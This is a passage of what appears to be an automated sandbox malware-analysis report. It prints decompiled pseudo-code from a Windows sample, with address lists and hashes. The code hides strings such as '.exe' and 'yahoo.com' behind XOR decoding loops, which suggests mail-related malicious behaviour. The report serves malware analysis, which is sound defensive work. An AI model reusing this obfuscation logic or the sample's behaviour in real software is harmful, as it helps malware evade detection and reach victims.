                                                                    				if(_t93 >= 0x77) {
                                                                    				}
                                                                    				_v163 = 0x65;
                                                                    				_v162 = 0x78;
                                                                    				_v161 = 0x65;
                                                                    				_v160 = 0;
                                                                    				E0041E5F0();
                                                                    				_t195 = _a8;
                                                                    				E004114B0(_t199, _t195);
                                                                    				_t200 = 0x10;
                                                                    				_t202 = _t201 + 4;
                                                                    				_t190 = _t195 + 4;
                                                                    				if( *((intOrPtr*)(_t195 + 0x18)) < 0x10) {
                                                                    					_t98 = _t190;
                                                                    				} else {
                                                                    					_t98 =  *_t190;
                                                                    				}
                                                                    				_t99 = E0041A190(_t98, 0x2e);
                                                                    				_t203 = _t202 + 8;
                                                                    				_v168 = _t99;
                                                                    				if(_t99 == 0) {
                                                                    					_v156 = 0x6c;
                                                                    					_v153 = 0x6c;
                                                                    					_v155 = 0x79;
                                                                    					_v154 = 0x79;
                                                                    					_t147 = _v168 + (0x00000003 - _v168 *  *0x447b60 & 0x00000004) * 0x65;
                                                                    					_v152 = 0x6e;
                                                                    					_v151 = 0x65;
                                                                    					_v150 = 0x23;
                                                                    					_v149 = 0x77;
                                                                    					_v148 = 0x64;
                                                                    					_v147 = 0x7d;
                                                                    					_v146 = 0xd;
                                                                    					_t105 = 0;
                                                                    					do {
                                                                    						if(_t147 >= 0x77) {
                                                                    							_t147 = _t147 ^ 0x00000042;
                                                                    						} else {
                                                                    							_t147 = _t147 ^ 0x0000001d;
                                                                    						}
                                                                    						 *(_t203 + _t105 + 0x20) =  *(_t203 + _t105 + 0x20) ^ 0x0000000d;
                                                                    						_t105 = _t105 + 1;
                                                                    					} while (_t105 < 0xb);
                                                                    					_t106 =  &_v156;
                                                                    					_t43 = _t106 + 1; // 0xe
                                                                    					_t177 = _t43;
                                                                    					do {
                                                                    						_t148 =  *_t106;
                                                                    						_t106 = _t106 + 1;
                                                                    					} while (_t148 != 0);
                                                                    					E00402810(_a4,  &_v156, _t106 - _t177);
                                                                    				} else {
                                                                    					if( *((intOrPtr*)(_t195 + 0x18)) >= _t200) {
                                                                    						_t190 =  *_t190;
                                                                    					}
                                                                    					_t198 = _a4;
                                                                    					_t132 =  *((intOrPtr*)(_t198 + 0x18));
                                                                    					_t188 = _t198 + 4;
                                                                    					if(_t132 < _t200) {
                                                                    						_t200 = _t188;
                                                                    					} else {
                                                                    						_t200 =  *_t188;
                                                                    					}
                                                                    					_t166 =  *((intOrPtr*)(_t198 + 0x14)) + _t200;
                                                                    					if(_t132 >= 0x10) {
                                                                    						_t188 =  *_t188;
                                                                    					}
                                                                    					E00406370(_t198, _t200, _t188, _t166, _t190, _v168);
                                                                    					_t135 =  &_v192;
                                                                    					_t189 = _t135 + 1;
                                                                    					do {
                                                                    						_t168 =  *_t135;
                                                                    						_t135 = _t135 + 1;
                                                                    					} while (_t168 != 0);
                                                                    					E0040D320(_t198, _t200,  &_v176, _t135 - _t189);
                                                                    				}
                                                                    				_v142 = 0x88;
                                                                    				_v134 = 0x88;
                                                                    				_v138 = 0xc1;
                                                                    				_v133 = 0xc1;
                                                                    				_t153 = _v168 + (0x00000003 - _v168 *  *0x447b60 & 0x00000004) * 0x65;
                                                                    				_v144 = 0xb9;
                                                                    				_v143 = 0x9c;
                                                                    				_v141 = 0x8d;
                                                                    				_v140 = 0x98;
                                                                    				_v139 = 0x89;
                                                                    				_v137 = 0xa7;
                                                                    				_v136 = 0xae;
                                                                    				_v135 = 0xc9;
                                                                    				_v132 = 0x94;
                                                                    				_v131 = 0xd4;
                                                                    				_v130 = 0xda;
                                                                    				_v129 = 0xec;
                                                                    				_t114 = 0;
                                                                    				do {
                                                                    					if(_t153 >= 0x77) {
                                                                    						_t153 = _t153 ^ 0x00000042;
                                                                    					} else {
                                                                    						_t153 = _t153 ^ 0x0000001d;
                                                                    					}
                                                                    					 *(_t203 + _t114 + 0x2c) =  *(_t203 + _t114 + 0x2c) ^ 0x000000ec;
                                                                    					_t114 = _t114 + 1;
                                                                    				} while (_t114 < 0x10);
                                                                    				 *0x44aec8( &_v128,  &_v144, GetTickCount() % 0x2710);
                                                                    				_t119 =  &_v128;
                                                                    				_t183 = _t119 + 1;
                                                                    				do {
                                                                    					_t155 =  *_t119;
                                                                    					_t119 = _t119 + 1;
                                                                    				} while (_t155 != 0);
                                                                    				_t196 = _a16;
                                                                    				E00402810(_a16,  &_v128, _t119 - _t183);
                                                                    				_t122 =  &_v172;
                                                                    				_t184 = _t122 + 1;
                                                                    				do {
                                                                    					_t158 =  *_t122;
                                                                    					_t122 = _t122 + 1;
                                                                    				} while (_t158 != 0);
                                                                    				E0040D320(_t196, _t200,  &_v164, _t122 - _t184);
                                                                    				_t125 =  &_v136;
                                                                    				_t186 = _t125 + 1;
                                                                    				do {
                                                                    					_t160 =  *_t125;
                                                                    					_t125 = _t125 + 1;
                                                                    				} while (_t160 != 0);
                                                                    				_t197 = _a12;
                                                                    				E00402810(_a12,  &_v128, _t125 - _t186);
                                                                    				_t129 =  &_v184;
                                                                    				_t187 = _t129 + 1;
                                                                    				do {
                                                                    					_t162 =  *_t129;
                                                                    					_t129 = _t129 + 1;
                                                                    				} while (_t162 != 0);
                                                                    				return E0040D320(_t197, _t200,  &_v176, _t129 - _t187);
                                                                    			}





















































































                                                                    0x00413052
                                                                    0x00413047
                                                                    0x00413067
                                                                    0x0041306d
                                                                    0x00413074
                                                                    0x0041306f
                                                                    0x0041306f
                                                                    0x0041306f
                                                                    0x0041307a
                                                                    0x0041307f
                                                                    0x0041307f
                                                                    0x0041309f
                                                                    0x004130a4
                                                                    0x004130a9
                                                                    0x004130ae
                                                                    0x004130b3
                                                                    0x004130b8
                                                                    0x004130bf
                                                                    0x004130ba
                                                                    0x004130ba
                                                                    0x004130ba
                                                                    0x004130c5
                                                                    0x004130ca
                                                                    0x004130ca
                                                                    0x004130d4
                                                                    0x004130d9
                                                                    0x004130de
                                                                    0x004130e3
                                                                    0x004130e8
                                                                    0x004130ed
                                                                    0x004130f5
                                                                    0x004130fd
                                                                    0x00413102
                                                                    0x00413107
                                                                    0x0041310a
                                                                    0x00413110
                                                                    0x0041310c
                                                                    0x0041310c
                                                                    0x0041310c
                                                                    0x00413115
                                                                    0x0041311a
                                                                    0x0041311f
                                                                    0x00413123
                                                                    0x00413182
                                                                    0x00413186
                                                                    0x00413199
                                                                    0x0041319d
                                                                    0x004131ae
                                                                    0x004131b0
                                                                    0x004131b5
                                                                    0x004131ba
                                                                    0x004131bf
                                                                    0x004131c4
                                                                    0x004131c9
                                                                    0x004131ce
                                                                    0x004131d3
                                                                    0x004131d5
                                                                    0x004131d8
                                                                    0x004131df
                                                                    0x004131da
                                                                    0x004131da
                                                                    0x004131da
                                                                    0x004131e2
                                                                    0x004131e7
                                                                    0x004131e8
                                                                    0x004131ed
                                                                    0x004131f1
                                                                    0x004131f1
                                                                    0x004131f4
                                                                    0x004131f4
                                                                    0x004131f6
                                                                    0x004131f7
                                                                    0x0041320a
                                                                    0x00413125
                                                                    0x00413128
                                                                    0x0041312a
                                                                    0x0041312a
                                                                    0x0041312c
                                                                    0x00413133
                                                                    0x00413138
                                                                    0x0041313b
                                                                    0x00413141
                                                                    0x0041313d
                                                                    0x0041313d
                                                                    0x0041313d
                                                                    0x00413146
                                                                    0x0041314b
                                                                    0x0041314d
                                                                    0x0041314d
                                                                    0x00413159
                                                                    0x0041315e
                                                                    0x00413162
                                                                    0x00413165
                                                                    0x00413165
                                                                    0x00413167
                                                                    0x00413168
                                                                    0x00413176
                                                                    0x00413176
                                                                    0x00413211
                                                                    0x00413215
                                                                    0x00413228
                                                                    0x0041322c
                                                                    0x0041323d
                                                                    0x0041323f
                                                                    0x00413244
                                                                    0x00413249
                                                                    0x0041324e
                                                                    0x00413253
                                                                    0x00413258
                                                                    0x0041325d
                                                                    0x00413262
                                                                    0x00413267
                                                                    0x0041326c
                                                                    0x00413271
                                                                    0x00413276
                                                                    0x0041327b
                                                                    0x00413280
                                                                    0x00413283
                                                                    0x0041328a
                                                                    0x00413285
                                                                    0x00413285
                                                                    0x00413285
                                                                    0x0041328d
                                                                    0x00413292
                                                                    0x00413293
                                                                    0x004132b2
                                                                    0x004132b8
                                                                    0x004132bf
                                                                    0x004132c2
                                                                    0x004132c2
                                                                    0x004132c4
                                                                    0x004132c5
                                                                    0x004132c9
                                                                    0x004132da
                                                                    0x004132df
                                                                    0x004132e3
                                                                    0x004132e6
                                                                    0x004132e6
                                                                    0x004132e8
                                                                    0x004132e9
                                                                    0x004132f7
                                                                    0x004132fc
                                                                    0x00413300
                                                                    0x00413303
                                                                    0x00413303
                                                                    0x00413305
                                                                    0x00413306
                                                                    0x0041330a
                                                                    0x0041331b
                                                                    0x00413320
                                                                    0x00413324
                                                                    0x00413327
                                                                    0x00413327
                                                                    0x00413329
                                                                    0x0041332a
                                                                    0x00413346

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick
                                                                    • String ID: #$.$.$d$e$e$e$i$n$p$w$x$z$}
                                                                    • API String ID: 536389180-2721937254
                                                                    • Opcode ID: e65b45f24b4065c9dfe1a22b753c0f3ee07997ea7d65dc7f3300c2ca128d91ed
                                                                    • Instruction ID: db8aa865835786eeec74abee6f333092b9e25c573af84edeb86da67176a37afa
                                                                    • Opcode Fuzzy Hash: e65b45f24b4065c9dfe1a22b753c0f3ee07997ea7d65dc7f3300c2ca128d91ed
                                                                    • Instruction Fuzzy Hash: F491053120C3819FD315CF28C854AAFBBD55BD6304F088A5EF4D697292DA28D649C76B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 64%
                                                                    			E004184D0(intOrPtr __ecx) {
                                                                    				intOrPtr _t90;
                                                                    				intOrPtr _t91;
                                                                    				signed int _t98;
                                                                    				intOrPtr _t106;
                                                                    				intOrPtr _t116;
                                                                    				signed int _t123;
                                                                    				intOrPtr _t126;
                                                                    				intOrPtr* _t128;
                                                                    				signed int _t135;
                                                                    				signed int _t140;
                                                                    				void* _t147;
                                                                    				signed int _t149;
                                                                    				signed int _t154;
                                                                    				void* _t158;
                                                                    				void* _t161;
                                                                    				void* _t166;
                                                                    				void* _t169;
                                                                    				signed int _t172;
                                                                    				signed int _t173;
                                                                    				intOrPtr _t176;
                                                                    				signed int _t177;
                                                                    				void* _t178;
                                                                    				signed int _t179;
                                                                    				intOrPtr _t180;
                                                                    				void* _t185;
                                                                    				void* _t186;
                                                                    				void* _t187;
                                                                    				void* _t188;
                                                                    				void* _t189;
                                                                    
                                                                    				_t180 = __ecx;
                                                                    				 *((intOrPtr*)(_t185 + 0x34)) = __ecx;
                                                                    				_t172 =  *(_t185 + 0x38);
                                                                    				if(_t172 >= 0x19) {
                                                                    					_t173 = _t172 + 0x6f;
                                                                    				} else {
                                                                    					_t173 = _t172 ^ 0x00000052;
                                                                    				}
                                                                    				E0041E5F0();
                                                                    				 *((char*)(_t185 + 0x24)) = 0xf3;
                                                                    				 *((char*)(_t185 + 0x2c)) = 0xf3;
                                                                    				_t135 =  *0x447d20; // 0x0
                                                                    				 *((char*)(_t185 + 0x25)) = 0xff;
                                                                    				 *((char*)(_t185 + 0x26)) = 0xf7;
                                                                    				 *((char*)(_t185 + 0x27)) = 0xf2;
                                                                    				 *((char*)(_t185 + 0x28)) = 0x9e;
                                                                    				 *((char*)(_t185 + 0x29)) = 0xf8;
                                                                    				 *((char*)(_t185 + 0x2a)) = 0xec;
                                                                    				 *((char*)(_t185 + 0x2b)) = 0xf1;
                                                                    				 *((char*)(_t185 + 0x2d)) = 0x84;
                                                                    				 *((char*)(_t185 + 0x2e)) = 0x9e;
                                                                    				 *((char*)(_t185 + 0x2f)) = 0x82;
                                                                    				 *((char*)(_t185 + 0x30)) = 0x9b;
                                                                    				 *((char*)(_t185 + 0x31)) = 0xcd;
                                                                    				 *((char*)(_t185 + 0x32)) = 0x80;
                                                                    				 *((char*)(_t185 + 0x33)) = 0xb3;
                                                                    				 *((char*)(_t185 + 0x34)) = 0xb4;
                                                                    				 *((char*)(_t185 + 0x35)) = 0xbe;
                                                                    				_t158 = 0;
                                                                    				do {
                                                                    					_t21 = _t135 - 0x5d; // -93
                                                                    					_t135 = _t135 + ((_t21 ^ 0x0000147c) + (_t21 ^ 0x0000147c) * 0x00000008) * 0x00000008 | 0x00005be7;
                                                                    					 *(_t185 + _t158 + 0x24) =  *(_t185 + _t158 + 0x24) ^ 0x000000be;
                                                                    					_t158 = _t158 + 1;
                                                                    				} while (_t158 < 0x12);
                                                                    				_t90 =  *((intOrPtr*)(_t185 + 0x844));
                                                                    				if( *((intOrPtr*)(_t90 + 0x18)) < 0x10) {
                                                                    					_t91 = _t90 + 4;
                                                                    				} else {
                                                                    					_t91 =  *((intOrPtr*)(_t90 + 4));
                                                                    				}
                                                                    				 *0x44aec8(_t185 + 0x44, _t185 + 0x28, _t91);
                                                                    				_t128 =  *0x43003c;
                                                                    				_t177 =  *0x447d28; // 0x0
                                                                    				_t186 = _t185 + 0xc;
                                                                    				_push(_t186 + 0x3c);
                                                                    				if(E00419410( *_t128(), _t180, _t186 + 0x40, _t94) != 0xffffffff) {
                                                                    					_t140 =  *(_t186 + 0x13) & 0x000000ff;
                                                                    					_t98 = _t177 & _t140 ^ 0x0000002b;
                                                                    					_t161 = 0x15;
                                                                    					do {
                                                                    						_t177 = _t177 + (_t140 ^ _t177 ^ 0x00000060 | _t98);
                                                                    						_t161 = _t161 - 1;
                                                                    					} while (_t161 != 0);
                                                                    					_t180 =  *((intOrPtr*)(_t186 + 0x38));
                                                                    					if(E00419290(_t180, _t186 + 0x440, 0x400) == 0xffffffff) {
                                                                    						_t178 = 6;
                                                                    						goto L34;
                                                                    					} else {
                                                                    						_t106 = E00422B9E(_t186 + 0x43c);
                                                                    						_t187 = _t186 + 4;
                                                                    						 *((intOrPtr*)(_t180 + 0x24)) = _t106;
                                                                    						if(_t106 == 0xfa) {
                                                                    							_t147 = 0x2c;
                                                                    							do {
                                                                    								_t173 = _t173 + (0x00000059 | _t173);
                                                                    								_t147 = _t147 - 1;
                                                                    							} while (_t147 != 0);
                                                                    							 *((char*)(_t187 + 0x17)) = 0x22;
                                                                    							 *((char*)(_t187 + 0x19)) = 0x22;
                                                                    							_t149 =  *0x447d20; // 0x0
                                                                    							 *((char*)(_t187 + 0x14)) = 0x24;
                                                                    							 *((char*)(_t187 + 0x15)) = 0x35;
                                                                    							 *((char*)(_t187 + 0x16)) = 0x26;
                                                                    							 *((char*)(_t187 + 0x18)) = 0x56;
                                                                    							 *((char*)(_t187 + 0x1a)) = 0x39;
                                                                    							 *((char*)(_t187 + 0x1b)) = 0x4c;
                                                                    							 *((char*)(_t187 + 0x1c)) = 0x56;
                                                                    							 *((char*)(_t187 + 0x1d)) = 0x4a;
                                                                    							 *((char*)(_t187 + 0x1e)) = 0x53;
                                                                    							 *((char*)(_t187 + 0x1f)) = 5;
                                                                    							 *((char*)(_t187 + 0x20)) = 0x48;
                                                                    							 *((char*)(_t187 + 0x21)) = 0x7b;
                                                                    							 *((char*)(_t187 + 0x22)) = 0x7c;
                                                                    							 *((char*)(_t187 + 0x23)) = 0x76;
                                                                    							_t166 = 0;
                                                                    							do {
                                                                    								_t58 = _t149 - 0x5d; // -93
                                                                    								_t149 = _t149 + ((_t58 ^ 0x0000147c) + (_t58 ^ 0x0000147c) * 0x00000008) * 0x00000008 | 0x00005be7;
                                                                    								 *(_t187 + _t166 + 0x14) =  *(_t187 + _t166 + 0x14) ^ 0x00000076;
                                                                    								_t166 = _t166 + 1;
                                                                    							} while (_t166 < 0x10);
                                                                    							_t176 =  *((intOrPtr*)(_t187 + 0x844));
                                                                    							if( *((intOrPtr*)(_t176 + 0x50)) < 0x10) {
                                                                    								_t116 = _t176 + 0x3c;
                                                                    							} else {
                                                                    								_t116 =  *((intOrPtr*)(_t176 + 0x3c));
                                                                    							}
                                                                    							 *0x44aec8(_t187 + 0x44, _t187 + 0x18, _t116);
                                                                    							_t179 =  *0x447d28; // 0x0
                                                                    							_t188 = _t187 + 0xc;
                                                                    							_push(_t188 + 0x3c);
                                                                    							if(E00419410( *_t128(), _t180, _t188 + 0x40, _t119) != 0xffffffff) {
                                                                    								_t154 =  *(_t188 + 0x13) & 0x000000ff;
                                                                    								_t123 = _t179 & _t154 ^ 0x0000002b;
                                                                    								_t169 = 0x15;
                                                                    								do {
                                                                    									_t179 = _t179 + (_t154 ^ _t179 ^ 0x00000060 | _t123);
                                                                    									_t169 = _t169 - 1;
                                                                    								} while (_t169 != 0);
                                                                    								if(E00419290(_t180, _t188 + 0x440, 0x400) == 0xffffffff) {
                                                                    									_t178 = 6;
                                                                    									goto L25;
                                                                    								} else {
                                                                    									_t126 = E00422B9E(_t188 + 0x43c);
                                                                    									_t189 = _t188 + 4;
                                                                    									 *((intOrPtr*)(_t180 + 0x24)) = _t126;
                                                                    									if(_t126 == 0xfa) {
                                                                    										_t178 = E004181F0(_t180,  *((intOrPtr*)(_t189 + 0x840)), _t176);
                                                                    										if(_t178 == 0) {
                                                                    											goto L26;
                                                                    										} else {
                                                                    											goto L34;
                                                                    										}
                                                                    									} else {
                                                                    										_t178 = 8;
                                                                    										goto L37;
                                                                    									}
                                                                    								}
                                                                    							} else {
                                                                    								_t178 = 7;
                                                                    								goto L25;
                                                                    							}
                                                                    						} else {
                                                                    							_t178 = 8;
                                                                    							goto L34;
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					_t178 = 7;
                                                                    					L34:
                                                                    					if(_t178 == 6 || _t178 == 7) {
                                                                    						L25:
                                                                    						 *((intOrPtr*)(_t180 + 0x28)) =  *((intOrPtr*)(_t180 + 0x1c));
                                                                    						E00419210(_t180);
                                                                    						goto L26;
                                                                    					} else {
                                                                    						if(_t178 == 0) {
                                                                    							L26:
                                                                    							return _t178;
                                                                    						} else {
                                                                    							L37:
                                                                    							if( *((intOrPtr*)(_t180 + 4)) == 0xffffffff) {
                                                                    								goto L26;
                                                                    							} else {
                                                                    								E00418330(_t180);
                                                                    								E00419180();
                                                                    								return _t178;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}
































                                                                    0x004184d8
                                                                    0x004184db
                                                                    0x004184e0
                                                                    0x004184e7
                                                                    0x004184ee
                                                                    0x004184e9
                                                                    0x004184e9
                                                                    0x004184e9
                                                                    0x004184f1
                                                                    0x004184fa
                                                                    0x004184fe
                                                                    0x00418502
                                                                    0x00418508
                                                                    0x0041850d
                                                                    0x00418512
                                                                    0x00418517
                                                                    0x0041851b
                                                                    0x00418520
                                                                    0x00418525
                                                                    0x0041852a
                                                                    0x0041852f
                                                                    0x00418533
                                                                    0x00418538
                                                                    0x0041853d
                                                                    0x00418542
                                                                    0x00418547
                                                                    0x0041854c
                                                                    0x00418551
                                                                    0x00418556
                                                                    0x00418560
                                                                    0x00418560
                                                                    0x00418574
                                                                    0x0041857a
                                                                    0x0041857e
                                                                    0x0041857f
                                                                    0x00418584
                                                                    0x0041858f
                                                                    0x00418596
                                                                    0x00418591
                                                                    0x00418591
                                                                    0x00418591
                                                                    0x004185a4
                                                                    0x004185aa
                                                                    0x004185b0
                                                                    0x004185b6
                                                                    0x004185bd
                                                                    0x004185d0
                                                                    0x004185dc
                                                                    0x004185ea
                                                                    0x004185ed
                                                                    0x004185f2
                                                                    0x004185fb
                                                                    0x004185fd
                                                                    0x004185fd
                                                                    0x00418600
                                                                    0x0041861b
                                                                    0x00418641
                                                                    0x00000000
                                                                    0x0041861d
                                                                    0x00418625
                                                                    0x0041862a
                                                                    0x00418632
                                                                    0x00418635
                                                                    0x00418659
                                                                    0x00418660
                                                                    0x00418664
                                                                    0x00418666
                                                                    0x00418666
                                                                    0x0041866d
                                                                    0x00418671
                                                                    0x00418675
                                                                    0x0041867b
                                                                    0x00418680
                                                                    0x00418685
                                                                    0x0041868a
                                                                    0x0041868e
                                                                    0x00418693
                                                                    0x00418698
                                                                    0x0041869c
                                                                    0x004186a1
                                                                    0x004186a6
                                                                    0x004186ab
                                                                    0x004186b0
                                                                    0x004186b5
                                                                    0x004186ba
                                                                    0x004186bf
                                                                    0x004186c1
                                                                    0x004186c1
                                                                    0x004186d5
                                                                    0x004186db
                                                                    0x004186df
                                                                    0x004186e0
                                                                    0x004186e5
                                                                    0x004186f0
                                                                    0x004186f7
                                                                    0x004186f2
                                                                    0x004186f2
                                                                    0x004186f2
                                                                    0x00418705
                                                                    0x0041870b
                                                                    0x00418711
                                                                    0x00418718
                                                                    0x0041872b
                                                                    0x0041874e
                                                                    0x0041875c
                                                                    0x0041875f
                                                                    0x00418764
                                                                    0x0041876d
                                                                    0x0041876f
                                                                    0x0041876f
                                                                    0x00418789
                                                                    0x004187ac
                                                                    0x00000000
                                                                    0x0041878b
                                                                    0x00418793
                                                                    0x00418798
                                                                    0x004187a0
                                                                    0x004187a3
                                                                    0x004187c6
                                                                    0x004187ca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004187a5
                                                                    0x004187a5
                                                                    0x00000000
                                                                    0x004187a5
                                                                    0x004187a3
                                                                    0x0041872d
                                                                    0x0041872d
                                                                    0x00000000
                                                                    0x0041872d
                                                                    0x00418637
                                                                    0x00418637
                                                                    0x00000000
                                                                    0x00418637
                                                                    0x00418635
                                                                    0x004185d2
                                                                    0x004185d2
                                                                    0x004187d0
                                                                    0x004187d3
                                                                    0x00418732
                                                                    0x00418737
                                                                    0x0041873a
                                                                    0x00000000
                                                                    0x004187e2
                                                                    0x004187e4
                                                                    0x0041873f
                                                                    0x0041874b
                                                                    0x004187ea
                                                                    0x004187ea
                                                                    0x004187ee
                                                                    0x00000000
                                                                    0x004187f4
                                                                    0x004187f6
                                                                    0x004187fd
                                                                    0x0041880e
                                                                    0x0041880e
                                                                    0x004187ee
                                                                    0x004187e4
                                                                    0x004187d3

                                                                    APIs
                                                                    • lstrlen.KERNEL32(?,?,00000000,?), ref: 004185BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: $$&$5$9$H$J$L$S$v${$|
                                                                    • API String ID: 1659193697-4052902452
                                                                    • Opcode ID: c7df81c9c04652c643949a1ff0bbe8cf32c5286781cb630a784f99a80bb7b053
                                                                    • Instruction ID: b443a9002dd2545cfb2a42d135fe251f7983a57c5715210b5e5f200512873159
                                                                    • Opcode Fuzzy Hash: c7df81c9c04652c643949a1ff0bbe8cf32c5286781cb630a784f99a80bb7b053
                                                                    • Instruction Fuzzy Hash: B7913B3150C3858AD314CB2888406EFBBD19BD6318F184B6EF5E5473D2DA78D94AC7AB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 95%
                                                                    			E00413350() {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __ebp;
                                                                    				signed int _t90;
                                                                    				signed int _t91;
                                                                    				signed int _t92;
                                                                    				signed int _t93;
                                                                    				signed int _t94;
                                                                    				signed int _t95;
                                                                    				signed int _t96;
                                                                    				signed int _t99;
                                                                    				signed int _t100;
                                                                    				signed int _t101;
                                                                    				signed int _t102;
                                                                    				signed int _t103;
                                                                    				signed int _t104;
                                                                    				signed int _t105;
                                                                    				signed int _t109;
                                                                    				intOrPtr _t111;
                                                                    				signed int _t124;
                                                                    				signed int _t125;
                                                                    				intOrPtr* _t126;
                                                                    				signed char _t135;
                                                                    				signed char _t136;
                                                                    				signed int _t144;
                                                                    				signed int _t176;
                                                                    				signed int _t185;
                                                                    				intOrPtr _t187;
                                                                    				void* _t188;
                                                                    
                                                                    				_push(0xffffffff);
                                                                    				_push(E0042FCA0);
                                                                    				_push( *[fs:0x0]);
                                                                    				 *[fs:0x0] = _t187;
                                                                    				_t188 = _t187 - 0x70;
                                                                    				_t176 =  *0x447b60; // 0x0
                                                                    				_t90 =  *(_t187 - 0x64) + (0x00000003 -  *(_t187 - 0x64) * _t176 & 0x00000004) * 0x65;
                                                                    				if(_t90 >= 0x77) {
                                                                    					_t91 = _t90 ^ 0x00000042;
                                                                    					__eflags = _t91;
                                                                    				} else {
                                                                    					_t91 = _t90 ^ 0x0000001d;
                                                                    				}
                                                                    				 *((char*)(_t188 + 0x20)) = 0x79;
                                                                    				if(_t91 >= 0x77) {
                                                                    					_t92 = _t91 ^ 0x00000042;
                                                                    					__eflags = _t92;
                                                                    				} else {
                                                                    					_t92 = _t91 ^ 0x0000001d;
                                                                    				}
                                                                    				 *((char*)(_t188 + 0x21)) = 0x61;
                                                                    				if(_t92 >= 0x77) {
                                                                    					_t93 = _t92 ^ 0x00000042;
                                                                    					__eflags = _t93;
                                                                    				} else {
                                                                    					_t93 = _t92 ^ 0x0000001d;
                                                                    				}
                                                                    				 *((char*)(_t188 + 0x22)) = 0x68;
                                                                    				if(_t93 >= 0x77) {
                                                                    					_t94 = _t93 ^ 0x00000042;
                                                                    					__eflags = _t94;
                                                                    				} else {
                                                                    					_t94 = _t93 ^ 0x0000001d;
                                                                    				}
                                                                    				 *((char*)(_t188 + 0x23)) = 0x6f;
                                                                    				if(_t94 >= 0x77) {
                                                                    					_t95 = _t94 ^ 0x00000042;
                                                                    					__eflags = _t95;
                                                                    				} else {
                                                                    					_t95 = _t94 ^ 0x0000001d;
                                                                    				}
                                                                    				 *((char*)(_t188 + 0x24)) = 0x6f;
                                                                    				if(_t95 >= 0x77) {
                                                                    					_t96 = _t95 ^ 0x00000042;
                                                                    					__eflags = _t96;
                                                                    				} else {
                                                                    					_t96 = _t95 ^ 0x0000001d;
                                                                    				}
                                                                    				 *((char*)(_t188 + 0x25)) = 0x2e;
                                                                    				if(_t96 >= 0x77) {
                                                                    					__eflags = _t96 ^ 0x00000042;
                                                                    				}
                                                                    				_t99 =  *(_t188 + 0x1c) + (0x00000003 -  *(_t188 + 0x1c) * _t176 & 0x00000004) * 0x65;
                                                                    				 *((char*)(_t188 + 0x26)) = 0x63;
                                                                    				 *((char*)(_t188 + 0x27)) = 0x6f;
                                                                    				 *((char*)(_t188 + 0x28)) = 0x6d;
                                                                    				 *((char*)(_t188 + 0x29)) = 0;
                                                                    				if(_t99 >= 0x77) {
                                                                    					_t100 = _t99 ^ 0x00000042;
                                                                    					__eflags = _t100;
                                                                    				} else {
                                                                    					_t100 = _t99 ^ 0x0000001d;
                                                                    				}
                                                                    				 *((char*)(_t188 + 0x2c)) = 0x67;
                                                                    				if(_t100 >= 0x77) {
                                                                    					_t101 = _t100 ^ 0x00000042;
                                                                    					__eflags = _t101;
                                                                    				} else {
                                                                    					_t101 = _t100 ^ 0x0000001d;
                                                                    				}
                                                                    				 *((char*)(_t188 + 0x2d)) = 0x6d;
                                                                    				if(_t101 >= 0x77) {
                                                                    					_t102 = _t101 ^ 0x00000042;
                                                                    					__eflags = _t102;
                                                                    				} else {
                                                                    					_t102 = _t101 ^ 0x0000001d;
                                                                    				}
                                                                    				 *((char*)(_t188 + 0x2e)) = 0x61;
                                                                    				if(_t102 >= 0x77) {
                                                                    					_t103 = _t102 ^ 0x00000042;
                                                                    					__eflags = _t103;
                                                                    				} else {
                                                                    					_t103 = _t102 ^ 0x0000001d;
                                                                    				}
                                                                    				 *((char*)(_t188 + 0x2f)) = 0x69;
                                                                    				if(_t103 >= 0x77) {
                                                                    					_t104 = _t103 ^ 0x00000042;
                                                                    					__eflags = _t104;
                                                                    				} else {
                                                                    					_t104 = _t103 ^ 0x0000001d;
                                                                    				}
